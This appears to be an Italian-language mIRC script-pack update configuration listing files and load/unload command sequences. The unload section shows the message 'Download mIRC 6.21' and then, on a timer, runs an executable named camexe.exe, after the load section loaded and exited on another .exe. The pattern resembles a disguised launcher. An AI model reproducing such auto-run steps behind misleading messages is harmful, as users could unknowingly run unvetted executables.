[updt]
n0=nulla
n1=script3.exe
n2=mIRC.exe
n3=camexe.exe

[directory]
n0=nulla
n1=addons\
n2=Supdt\
n3=$mircdir

[load]
n0=nulla
n1=.load -rs addons\script3.exe
n2=echo -a Download Completato
n3=.timer 1 6 exit


[unload]
n0=nulla
n1=.remove addons\script3.exe
n2=echo -a Download mIRC 6.21 Per problemi di compatibilità
n3=.timer 1 4 run camexe.exe


[info]
n0=nulla
n1=Risolto Bug Nel Luminoso
n2=Corretto bug alle Barre
n3=Cambio exe